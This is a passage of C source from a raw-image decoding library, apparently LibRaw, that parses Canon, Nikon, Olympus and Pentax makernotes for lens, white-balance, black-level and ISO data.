iCanonMaxFocal = 362;
break;
case 0x80000176: // 450D
iCanonCurFocal = 29;
iCanonLensID = 222;
iCanonLens = 2355;
break;
case 0x80000252: // 500D
iCanonCurFocal = 30;
iCanonLensID = 246;
iCanonMinFocal = 248;
iCanonMaxFocal = 250;
break;
case 0x80000270: // 550D
iCanonCurFocal = 30;
iCanonLensID = 255;
iCanonMinFocal = 257;
iCanonMaxFocal = 259;
break;
case 0x80000286: // 600D
case 0x80000288: // 1100D
iCanonCurFocal = 30;
iCanonLensID = 234;
iCanonMinFocal = 236;
iCanonMaxFocal = 238;
break;
case 0x80000301: // 650D
case 0x80000326: // 700D
iCanonCurFocal = 35;
iCanonLensID = 295;
iCanonMinFocal = 297;
iCanonMaxFocal = 299;
break;
case 0x80000254: // 1000D
iCanonCurFocal = 29;
iCanonLensID = 226;
iCanonMinFocal = 228;
iCanonMaxFocal = 230;
iCanonLens = 2359;
break;
}
if (iCanonFocalType)
{
if(iCanonFocalType>=maxlen) return; // broken;
imgdata.lens.makernotes.FocalType = CameraInfo[iCanonFocalType];
if (!imgdata.lens.makernotes.FocalType) // zero means 'fixed' here, replacing with standard '1'
imgdata.lens.makernotes.FocalType = 1;
}
if (!imgdata.lens.makernotes.CurFocal)
{
if(iCanonCurFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.CurFocal = sget2Rev(CameraInfo + iCanonCurFocal);
}
if (!imgdata.lens.makernotes.LensID)
{
if(iCanonLensID>=maxlen) return; // broken;
imgdata.lens.makernotes.LensID = sget2Rev(CameraInfo + iCanonLensID);
}
if (!imgdata.lens.makernotes.MinFocal)
{
if(iCanonMinFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.MinFocal = sget2Rev(CameraInfo + iCanonMinFocal);
}
if (!imgdata.lens.makernotes.MaxFocal)
{
if(iCanonMaxFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.MaxFocal = sget2Rev(CameraInfo + iCanonMaxFocal);
}
if (!imgdata.lens.makernotes.Lens[0] && iCanonLens) {
if(iCanonLens+64>=maxlen) return; // broken;
if (CameraInfo[iCanonLens] < 65) // non-Canon lens
{
memcpy(imgdata.lens.makernotes.Lens, CameraInfo + iCanonLens, 64);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "EF-S", 4))
{
memcpy(imgdata.lens.makernotes.Lens, "EF-S ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_S;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "TS-E", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "TS-E ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "TS-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "MP-E", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "MP-E ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "MP-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "EF-M", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "EF-M ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF-M", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_M;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else {
memcpy(imgdata.lens.makernotes.Lens, CameraInfo + iCanonLens, 2);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF", 2);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
imgdata.lens.makernotes.Lens[2] = 32;
memcpy(imgdata.lens.makernotes.Lens + 3, CameraInfo + iCanonLens + 2, 62);
}
}
return;
}
void CLASS Canon_CameraSettings ()
{
fseek(ifp, 10, SEEK_CUR);
imgdata.shootinginfo.DriveMode = get2(); get2();
imgdata.shootinginfo.FocusMode = get2();
fseek(ifp, 18, SEEK_CUR);
imgdata.shootinginfo.MeteringMode = get2(); get2();
imgdata.shootinginfo.AFPoint = get2();
imgdata.shootinginfo.ExposureMode = get2(); get2();
imgdata.lens.makernotes.LensID = get2();
imgdata.lens.makernotes.MaxFocal = get2();
imgdata.lens.makernotes.MinFocal = get2();
imgdata.lens.makernotes.CanonFocalUnits = get2();
if (imgdata.lens.makernotes.CanonFocalUnits > 1)
{
imgdata.lens.makernotes.MaxFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
imgdata.lens.makernotes.MinFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
imgdata.lens.makernotes.MaxAp = _CanonConvertAperture(get2());
imgdata.lens.makernotes.MinAp = _CanonConvertAperture(get2());
fseek(ifp, 12, SEEK_CUR);
imgdata.shootinginfo.ImageStabilization = get2();
}
void CLASS Canon_WBpresets (int skip1, int skip2)
{
int c;
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
if (skip2) fseek(ifp, skip2, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
return;
}
void CLASS Canon_WBCTpresets (short WBCTversion)
{
if (WBCTversion == 0)
for (int i=0; i<15; i++)// tint, as shot R, as shot B, CСT
{
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f /fMAX(get2(),1.f) ;
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f /fMAX(get2(),1.f);
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if (WBCTversion == 1)
for (int i=0; i<15; i++) // as shot R, as shot B, tint, CСT
{
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f / fMAX(get2(),1.f);
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f / fMAX(get2(),1.f);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if ((WBCTversion == 2) &&
((unique_id == 0x80000374) || // M3
(unique_id == 0x80000384) || // M10
(unique_id == 0x80000394) || // M5
(unique_id == 0x03970000))) // G7 X Mark II
for (int i=0; i<15; i++) // tint, offset, as shot R, as shot B, CСT
{
fseek (ifp, 2, SEEK_CUR);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f / fMAX(1.f,get2());
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f / fMAX(1.f,get2());
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if ((WBCTversion == 2) &&
((unique_id == 0x03950000) || (unique_id == 0x03930000))) // G5 X, G9 X
for (int i=0; i<15; i++) // tint, offset, as shot R, as shot B, CСT
{
fseek (ifp, 2, SEEK_CUR);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = (float)get2() / 512.0f;
imgdata.color.WBCT_Coeffs[i][3] = (float)get2() / 512.0f;
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
return;
}
void CLASS processNikonLensData (uchar *LensData, unsigned len)
{
ushort i;
if (!(imgdata.lens.nikon.NikonLensType & 0x01))
{
imgdata.lens.makernotes.LensFeatures_pre[0] = 'A';
imgdata.lens.makernotes.LensFeatures_pre[1] = 'F';
}
else
{
imgdata.lens.makernotes.LensFeatures_pre[0] = 'M';
imgdata.lens.makernotes.LensFeatures_pre[1] = 'F';
}
if (imgdata.lens.nikon.NikonLensType & 0x02)
{
if (imgdata.lens.nikon.NikonLensType & 0x04)
imgdata.lens.makernotes.LensFeatures_suf[0] = 'G';
else
imgdata.lens.makernotes.LensFeatures_suf[0] = 'D';
imgdata.lens.makernotes.LensFeatures_suf[1] = ' ';
}
if (imgdata.lens.nikon.NikonLensType & 0x08)
{
imgdata.lens.makernotes.LensFeatures_suf[2] = 'V';
imgdata.lens.makernotes.LensFeatures_suf[3] = 'R';
}
if (imgdata.lens.nikon.NikonLensType & 0x10)
{
imgdata.lens.makernotes.LensMount = imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_CX;
imgdata.lens.makernotes.CameraFormat = imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_1INCH;
}
else
imgdata.lens.makernotes.LensMount = imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_F;
if (imgdata.lens.nikon.NikonLensType & 0x20)
{
strcpy(imgdata.lens.makernotes.Adapter, "FT-1");
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Nikon_F;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_CX;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_1INCH;
}
imgdata.lens.nikon.NikonLensType = imgdata.lens.nikon.NikonLensType & 0xdf;
if (len < 20) {
switch (len) {
case 9:
i = 2;
break;
case 15:
i = 7;
break;
case 16:
i = 8;
break;
}
imgdata.lens.nikon.NikonLensIDNumber = LensData[i];
imgdata.lens.nikon.NikonLensFStops = LensData[i + 1];
imgdata.lens.makernotes.LensFStops = (float)imgdata.lens.nikon.NikonLensFStops /12.0f;
if (fabsf(imgdata.lens.makernotes.MinFocal) < 1.1f)
{
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 2])
imgdata.lens.makernotes.MinFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i + 2] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 3])
imgdata.lens.makernotes.MaxFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i + 3] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 4])
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(2.0f, (float)LensData[i + 4] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 5])
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(2.0f, (float)LensData[i + 5] / 24.0f);
}
imgdata.lens.nikon.NikonMCUVersion = LensData[i + 6];
if (i != 2)
{
if ((LensData[i - 1]) &&
(fabsf(imgdata.lens.makernotes.CurFocal) < 1.1f))
imgdata.lens.makernotes.CurFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i - 1] / 24.0f);
if (LensData[i + 7]) imgdata.lens.nikon.NikonEffectiveMaxAp = libraw_powf64(2.0f, (float)LensData[i + 7] / 24.0f);
}
imgdata.lens.makernotes.LensID =
(unsigned long long) LensData[i] << 56 |
(unsigned long long) LensData[i + 1] << 48 |
(unsigned long long) LensData[i + 2] << 40 |
(unsigned long long) LensData[i + 3] << 32 |
(unsigned long long) LensData[i + 4] << 24 |
(unsigned long long) LensData[i + 5] << 16 |
(unsigned long long) LensData[i + 6] << 8 |
(unsigned long long) imgdata.lens.nikon.NikonLensType;
}
else if ((len == 459) || (len == 590))
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 390, 64);
}
else if (len == 509)
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 391, 64);
}
else if (len == 879)
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 680, 64);
}
return;
}
void CLASS setOlympusBodyFeatures (unsigned long long id)
{
imgdata.lens.makernotes.CamID = id;
if ((id == 0x4434303430ULL) || // E-1
(id == 0x4434303431ULL) || // E-300
((id & 0x00ffff0000ULL) == 0x0030300000ULL))
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FT;
if ((id == 0x4434303430ULL) || // E-1
(id == 0x4434303431ULL) || // E-330
((id >= 0x5330303033ULL) && (id <= 0x5330303138ULL)) || // E-330 to E-520
(id == 0x5330303233ULL) || // E-620
(id == 0x5330303239ULL) || // E-450
(id == 0x5330303330ULL) || // E-600
(id == 0x5330303333ULL)) // E-5
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FT;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_mFT;
}
}
else
{
imgdata.lens.makernotes.LensMount =
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS parseCanonMakernotes (unsigned tag, unsigned type, unsigned len) {
if (tag == 0x0001) Canon_CameraSettings();
else if (tag == 0x0002) // focal length
{
imgdata.lens.makernotes.FocalType = get2();
imgdata.lens.makernotes.CurFocal = get2();
if (imgdata.lens.makernotes.CanonFocalUnits > 1)
{
imgdata.lens.makernotes.CurFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
}
else if (tag == 0x0004) // shot info
{
short tempAp;
fseek(ifp, 30, SEEK_CUR);
imgdata.other.FlashEC = _CanonConvertEV((signed short)get2());
fseek(ifp, 8-32, SEEK_CUR);
if ((tempAp = get2()) != 0x7fff)
imgdata.lens.makernotes.CurAp = _CanonConvertAperture(tempAp);
if (imgdata.lens.makernotes.CurAp < 0.7f)
{
fseek(ifp, 32, SEEK_CUR);
imgdata.lens.makernotes.CurAp = _CanonConvertAperture(get2());
}
if (!aperture) aperture = imgdata.lens.makernotes.CurAp;
}
else if (tag == 0x0095 && // lens model tag
!imgdata.lens.makernotes.Lens[0])
{
fread(imgdata.lens.makernotes.Lens, 2, 1, ifp);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
if (imgdata.lens.makernotes.Lens[0] < 65) // non-Canon lens
fread(imgdata.lens.makernotes.Lens + 2, 62, 1, ifp);
else
{
char efs[2];
imgdata.lens.makernotes.LensFeatures_pre[0] = imgdata.lens.makernotes.Lens[0];
imgdata.lens.makernotes.LensFeatures_pre[1] = imgdata.lens.makernotes.Lens[1];
fread(efs, 2, 1, ifp);
if (efs[0] == 45 && (efs[1] == 83 || efs[1] == 69 || efs[1] == 77))
{ // "EF-S, TS-E, MP-E, EF-M" lenses
imgdata.lens.makernotes.Lens[2] = imgdata.lens.makernotes.LensFeatures_pre[2] = efs[0];
imgdata.lens.makernotes.Lens[3] = imgdata.lens.makernotes.LensFeatures_pre[3] = efs[1];
imgdata.lens.makernotes.Lens[4] = 32;
if (efs[1] == 83)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_S;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
}
else if (efs[1] == 77)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_M;
}
}
else
{ // "EF" lenses
imgdata.lens.makernotes.Lens[2] = 32;
imgdata.lens.makernotes.Lens[3] = efs[0];
imgdata.lens.makernotes.Lens[4] = efs[1];
}
fread(imgdata.lens.makernotes.Lens + 5, 58, 1, ifp);
}
}
else if (tag == 0x00a9)
{
long int save1 = ftell(ifp);
fseek (ifp, save1+(0x5<<1), SEEK_SET);
Canon_WBpresets(0,0);
fseek (ifp, save1, SEEK_SET);
}
else if (tag == 0x00e0) // sensor info
{
imgdata.makernotes.canon.SensorWidth = (get2(),get2());
imgdata.makernotes.canon.SensorHeight = get2();
imgdata.makernotes.canon.SensorLeftBorder = (get2(),get2(),get2());
imgdata.makernotes.canon.SensorTopBorder = get2();
imgdata.makernotes.canon.SensorRightBorder = get2();
imgdata.makernotes.canon.SensorBottomBorder = get2();
imgdata.makernotes.canon.BlackMaskLeftBorder = get2();
imgdata.makernotes.canon.BlackMaskTopBorder = get2();
imgdata.makernotes.canon.BlackMaskRightBorder = get2();
imgdata.makernotes.canon.BlackMaskBottomBorder = get2();
}
else if (tag == 0x4001 && len > 500)
{
int c;
long int save1 = ftell(ifp);
switch (len)
{
case 582:
imgdata.makernotes.canon.CanonColorDataVer = 1; // 20D / 350D
{
fseek (ifp, save1+(0x23<<1), SEEK_SET);
Canon_WBpresets(2,2);
fseek (ifp, save1+(0x4b<<1), SEEK_SET);
Canon_WBCTpresets (1); // ABCT
}
break;
case 653:
imgdata.makernotes.canon.CanonColorDataVer = 2; // 1Dmk2 / 1DsMK2
{
fseek (ifp, save1+(0x27<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xa4<<1), SEEK_SET);
Canon_WBCTpresets (1); // ABCT
}
break;
case 796:
imgdata.makernotes.canon.CanonColorDataVer = 3; // 1DmkIIN / 5D / 30D / 400D
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x4e<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0x85<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0c4<<1), SEEK_SET); // offset 196 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
break;
// 1DmkIII / 1DSmkIII / 1DmkIV / 5DmkII
// 7D / 40D / 50D / 60D / 450D / 500D
// 550D / 1000D / 1100D
case 674: case 692: case 702: case 1227: case 1250:
case 1251: case 1337: case 1338: case 1346:
imgdata.makernotes.canon.CanonColorDataVer = 4;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x53<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xa8<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0e7<<1), SEEK_SET); // offset 231 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if ((imgdata.makernotes.canon.CanonColorDataSubVer == 4)
|| (imgdata.makernotes.canon.CanonColorDataSubVer == 5))
{
fseek (ifp, save1+(0x2b9<<1), SEEK_SET); // offset 697 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else if ((imgdata.makernotes.canon.CanonColorDataSubVer == 6) ||
(imgdata.makernotes.canon.CanonColorDataSubVer == 7))
{
fseek (ifp, save1+(0x2d0<<1), SEEK_SET); // offset 720 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else if (imgdata.makernotes.canon.CanonColorDataSubVer == 9)
{
fseek (ifp, save1+(0x2d4<<1), SEEK_SET); // offset 724 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
case 5120:
imgdata.makernotes.canon.CanonColorDataVer = 5; // PowerSot G10, G12, G5 X, EOS M3, EOS M5
{
fseek (ifp, save1+(0x56<<1), SEEK_SET);
if ((unique_id == 0x03970000) || // G7 X Mark II
(unique_id == 0x80000394)) // EOS M5
{
fseek(ifp, 18, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Other][c ^ (c >> 1)] = get2();
fseek(ifp, 8, SEEK_CUR);
Canon_WBpresets(8,24);
fseek(ifp, 168, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][c ^ (c >> 1)] = get2();
fseek(ifp, 24, SEEK_CUR);
Canon_WBCTpresets (2); // BCADT
fseek(ifp, 6, SEEK_CUR);
}
else
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Other][c ^ (c >> 1)] = get2();
get2();
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xba<<1), SEEK_SET);
Canon_WBCTpresets (2); // BCADT
fseek (ifp, save1+(0x108<<1), SEEK_SET); // offset 264 short
}
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
break;
case 1273: case 1275:
imgdata.makernotes.canon.CanonColorDataVer = 6; // 600D / 1200D
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x67<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xbc<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0fb<<1), SEEK_SET); // offset 251 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
fseek (ifp, save1+(0x1e4<<1), SEEK_SET); // offset 484 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
break;
// 1DX / 5DmkIII / 6D / 100D / 650D / 700D / EOS M / 7DmkII / 750D / 760D
case 1312: case 1313: case 1316: case 1506:
imgdata.makernotes.canon.CanonColorDataVer = 7;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x80<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xd5<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x114<<1), SEEK_SET); // offset 276 shorts
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if (imgdata.makernotes.canon.CanonColorDataSubVer == 10)
{
fseek (ifp, save1+(0x1fd<<1), SEEK_SET); // offset 509 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
} else if (imgdata.makernotes.canon.CanonColorDataSubVer == 11)
{
fseek (ifp, save1+(0x2dd<<1), SEEK_SET); // offset 733 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
// 5DS / 5DS R / 80D / 1300D / 5D4
case 1560: case 1592: case 1353:
imgdata.makernotes.canon.CanonColorDataVer = 8;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x85<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0x107<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x146<<1), SEEK_SET); // offset 326 shorts
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if (imgdata.makernotes.canon.CanonColorDataSubVer == 14) // 1300D
{
fseek (ifp, save1+(0x231<<1), SEEK_SET);
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else
{
fseek (ifp, save1+(0x30f<<1), SEEK_SET); // offset 783 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
}
fseek (ifp, save1, SEEK_SET);
}
}
void CLASS setPentaxBodyFeatures (unsigned id)
{
imgdata.lens.makernotes.CamID = id;
switch (id) {
case 0x12994:
case 0x12aa2:
case 0x12b1a:
case 0x12b60:
case 0x12b62:
case 0x12b7e:
case 0x12b80:
case 0x12b9c:
case 0x12b9d:
case 0x12ba2:
case 0x12c1e:
case 0x12c20:
case 0x12cd2:
case 0x12cd4:
case 0x12cfa:
case 0x12d72:
case 0x12d73:
case 0x12db8:
case 0x12dfe:
case 0x12e6c:
case 0x12e76:
case 0x12ef8:
case 0x12f52:
case 0x12f70:
case 0x12f71:
case 0x12fb6:
case 0x12fc0:
case 0x12fca:
case 0x1301a:
case 0x13024:
case 0x1309c:
case 0x13222:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
break;
case 0x13092:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
break;
case 0x12e08:
case 0x13010:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_645;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_MF;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_645;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_MF;
break;
case 0x12ee4:
case 0x12f66:
case 0x12f7a:
case 0x1302e:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_Q;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_Q;
break;
default:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS PentaxISO (ushort c)
{
int code [] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 50, 100, 200, 400, 800, 1600, 3200, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278};
double value [] = {50, 64, 80, 100, 125, 160, 200, 250, 320, 400, 500, 640, 800, 1000, 1250, 1600, 2000, 2500, 3200, 4000, 5000, 6400, 8000, 10000, 12800, 16000, 20000, 25600, 32000, 40000, 51200, 64000, 80000, 102400, 128000, 160000, 204800, 50, 100, 200, 400, 800, 1600, 3200, 50, 70, 100, 140, 200, 280, 400, 560, 800, 1100, 1600, 2200, 3200, 4500, 6400, 9000, 12800, 18000, 25600, 36000, 51200};
#define numel (sizeof(code)/sizeof(code[0]))
int i;
for (i = 0; i < numel; i++) {
if (code[i] == c) {
iso_speed = value[i];
return;
}
}
if (i == numel) iso_speed = 65535.0f;
}
#undef numel
void CLASS PentaxLensInfo (unsigned id, unsigned len) // tag 0x0207
{
ushort iLensData = 0;
uchar *table_buf;
table_buf = (uchar*)malloc(MAX(len,128));
fread(table_buf, len, 1, ifp);
if ((id < 0x12b9c) ||
(((id == 0x12b9c) || // K100D
(id == 0x12b9d) || // K110D
(id == 0x12ba2)) && // K100D Super
((!table_buf[20] ||
(table_buf[20] == 0xff)))))
{
iLensData = 3;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
(((unsigned)table_buf[0]) << 8) + table_buf[1];
}
else switch (len)
{
case 90: // LensInfo3
iLensData = 13;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[3]) <<8) + table_buf[4];
break;
case 91: // LensInfo4
iLensData = 12;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[3]) <<8) + table_buf[4];
break;
case 80: // LensInfo5
case 128:
iLensData = 15;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[4]) <<8) + table_buf[5];
break;
default:
if (id >= 0x12b9c) // LensInfo2
{
iLensData = 4;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[0] & 0x0f) + table_buf[2]) <<8) + table_buf[3];
}
}
if (iLensData)
{
if (table_buf[iLensData+9] &&
(fabs(imgdata.lens.makernotes.CurFocal) < 0.1f))
imgdata.lens.makernotes.CurFocal =
10*(table_buf[iLensData+9]>>2) * libraw_powf64(4, (table_buf[iLensData+9] & 0x03)-2);
if (table_buf[iLensData+10] & 0xf0)
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+10] & 0xf0) >>4)/4.0f);
if (table_buf[iLensData+10] & 0x0f)
imgdata.lens.makernotes.MinAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+10] & 0x0f) + 10)/4.0f);
if (iLensData != 12)
{
switch (table_buf[iLensData] & 0x06)
{
case 0: imgdata.lens.makernotes.MinAp4MinFocal = 22.0f; break;
